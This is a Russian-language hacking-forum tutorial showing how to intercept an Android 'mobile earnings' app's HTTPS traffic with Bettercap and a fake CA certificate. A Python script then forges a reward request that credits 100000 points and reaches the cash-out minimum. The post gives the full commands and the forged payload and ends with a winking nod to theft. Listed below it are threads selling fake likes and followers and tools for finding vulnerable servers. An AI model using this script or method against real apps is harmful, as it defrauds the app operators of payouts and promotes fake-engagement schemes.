Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
persona_b2b_comprendre_roles_comite_dachat-800x400.jpg
Сегодня я хотел бы показать на примере, как халатно относятся разработчики приложений для "мобильного заработка" (заработка разработчиков, естественно) к безопасности своих программ.

Инструменты:
  1. Bettercap
    На Kali Linux:
    sudo apt-get install build-essential ruby-dev libpcap-dev
    sudo apt-get install bettercap
    На других Linux-системах:
    git clone

    Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


    cd bettercap
    gem build bettercap.gemspec
    sudo gem install bettercap*.gem
  2. VM либо телефон на android с play market

Устанавливаем приложение.
Достаточно набрать в поиске гугл плей что-то вроде "Мобильный заработок" или "Накрутка лайков вк" и т.д.
Я выбрал с картинкой посмешнее и названием поглупее.

Поддельный сертефикат.
Большинство приложений сегодня используют https соеденение. Что бы мы могли расшифровать трафик, будем использовать поддельный сертефикат. Таковой уже имеется в Bettercap в директории /sudo/.bettercap/bettercap-ca.pem . Его нужно установить на телефон (настройки > безопасность > сертефикаты).
Начинаем снифать трафик.
В консоли компьютера пишем:
sudo bettercap -T 192.168.0.100 --proxy-https --sniffer
Где
-T - ip телефона
--proxy-https - использовать прокси с поддельным https сертефикатом для расшифровки траффика
--sniffer - запустить сниффер пакетов.
Снимок экрана из 2017-07-15 19-05-33.png
Исследуем трафик приложения.
Теперь, когда трафик отслеживается, поклацаем по разным кнопкам и попробуем выполнить задание.
Screenshot_2017-07-15-18-52-47.png
Я нашёл для себя интересными два запроса:

получил бонус
[192.168.0.100] POST %ссылка% ( text/html ) [200]

[REQUEST HEADERS]
'User-Agent' : %user_agent%
'Content-Type : application/x-www-form-urlencoded'
'Content-Length : 44'
Host : url.bitcoin-miner.ru
Connection : close
Accept-Encoding : identity

[REQUEST BODY]
userid : %user_id%
points : 100
type : Daily_Reward_v2
Выполнил задание
[192.168.0.100] POST %ссылка% ( text/html ) [200]

[REQUEST HEADERS]
User-Agent : %user_agent%
Content-Type : application/x-www-form-urlencoded
Content-Length : 40
Host : url.bitcoin-miner.ru
Connection : close
Accept-Encoding : identity

[REQUEST BODY]
username : %user_name%
points : 50
type : Vungle_Video
Создаём кастомный запрос.
Поэксперементировав с данными из полученых запросов, пишем скрипт для отправки кастомного запроса:
import requests
link = '%ссылка%'
headers = {'User-Agent' : %user_agent%,
'Content-Type' : 'application/x-www-form-urlencoded',
'Content-Length' : '44',
'Host' : 'url.bitcoin-miner.ru',
'Connection' : 'close',
'Accept-Encoding' : 'identity'}
payload = {'userid' : %user_id%,
'points' : 100000, # да да, можно поставить столько монет, сколько захочешь
'type' : 'Vungle_Video'}
r = requests.post(link, headers=headers, data=payload) # можно запихнуть в цикл, если бы сервис не разрешал менять колличество получаемых очков за раз.
print(r.text)
Запрос выполнился с ответом
{"result":"true","msg":"Points Updated"}
Очки начислены мне на аккаунт, это, кстати говоря, минимальная сумма выплаты (8$)
Screenshot_2017-07-15-19-04-52.png
Итог.
Гугл плей забит подобными приложениями, разработчики которых зарабатывают на желании быстрой наживы у неокрепших умов. Чаще всего, правда, создатели совсем не заботятся о безопасности своего детища. В этом случае мне пришлось поэксперементировать с запросами, но что-то мне подсказывает, что во многих подобных приложениях можно просто циклично переотправить один запрос, выдающий монетки за выполненное задание.

P.S: воровство - это плохо, но исследование трафика и накрутку лайков никто не запрещал ;)
 
Название темы
Автор Заголовок Раздел Ответы Дата
G Бесконечная накрутка в уязвимых android приложениях Kali Linux 0
Bayres Ожидает оплаты Boost4you | накрутка в социальных сетях! | yt, tt, ig, tg, fb, tw Ищу работу. Предлагаю свои услуги. 1
B Закрыто Ютуб Комбайн - накрутка/лайкер/вывод в топ Корзина 1
P pro-smm.biz - накрутка в социальных сетях Ищу работу. Предлагаю свои услуги. 1
S stream promotion ru - накрутка зрителей, лайков, подписчиков, просмотров. Ищу работу. Предлагаю свои услуги. 1
T Telegram K1ng - вывод в ТОП и накрутка Telegram каналов по вашему ключевому запросу Ищу работу. Предлагаю свои услуги. 0
S Stream promotion ru - накрутка зрителей, лайков, подписчиков, просмотров. Ищу работу. Предлагаю свои услуги. 0
S [СЛИВ] Самая ДЕШЕВАЯ накрутка Инстаграм,Вконтакте,Телеграм,ТикТок,Ютуб. Вывод сайта в ТОП seo! Ищу работу. Предлагаю свои услуги. 1
S SHARKSMM - Самая дешёвая накрутка в ВК/YouTube/Telegram/Instagram. Лёгкая возможность заработать! Предоставляю работу. Ищу специалиста. 0
G Нужна накрутка отзывов на постоянной основе. Вопросы и интересы 3
S ⚡SmmHUB.top⚡ - накрутка (Instagram/Telegram/YouTube/VK/Tik-Tok/Fb/Twitter/WebTraffic) Ищу работу. Предлагаю свои услуги. 1
T >>БЕСКОНЕЧНАЯ накрутка ЖИВЫХ друзей VK! [69р] Ищу работу. Предлагаю свои услуги. 0
R Самая дешевая накрутка TG: 150К просмотров на пост - 100 рублей / 1000 просмотров - 1 рубль Ищу работу. Предлагаю свои услуги. 1
W ru.wos-api.biz - Качественная накрутка Youtube, Instagram, Telegram, Facebook и других соц.сетей Ищу работу. Предлагаю свои услуги. 0
R ◉ Cleverinsta Inc ➜ Быстрое продвижение и накрутка ➜ Нет собак и списаний ➜ Топовые условия и скидки Ищу работу. Предлагаю свои услуги. 0
S Качественная накрутка счетчиков/трафик Трафик, загрузки, инсталлы, iframe 0
C Регер + накрутка Инстаграм СИ/Фишинг/Мошенничество 6
S Легчайшая накрутка Instagram (и не только его) Другие ЯП 8
T Халявная накрутка 500 Like & 1500 просмотров в instagram Другое 3
K Самая дешевевая накрутка в telegram Ищу работу. Предлагаю свои услуги. 0
1 Бесплатная накрутка в соц. сетях и не только. Полезные статьи 14
Sasha3108 Качественная накрутка на YouTube Способы заработка 5
N Оптовая накрутка instagram Ищу работу. Предлагаю свои услуги. 2
АнАлЬнАя ЧуПаКаБрА INLINE [dushewno.ru] (B\C) накрутка Инстаграм Проекты Private Keeper 0
M Бесплатная накрутка. Заработок денег, голосов. Способы заработка 0
C AddMeFast BOT — накрутка социальных сетей Софт для работы с текстом/Другой софт 4
M Пассивная накрутка денег | 0.01p = 1 ceк. Способы заработка 30
D Программа для youtobe накрутка продажная ? Свободное общение и флейм 2
B Проверено [SELL] Инструменты для добычи уязвимых дедиков :: RDP/Shodan.io Парсер/Сканер уязвимостей Продажа софта 2
E Интересно Поиск компьютеров уязвимых к атакам Уязвимости и взлом 0
И Поиск и взлом уязвимых устройств интернета Уязвимости и взлом 0
K Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
V Поиск и взлом уязвимых устройств интернета вещей Полезные статьи 1
S Бесплатный сканер обнаружил более 50 000 уязвимых перед ETERNALBLUE машин Новости в сети 0
S Китайские хакеры продают инструмент для взлома уязвимых web-камер Новости в сети 0

Название темы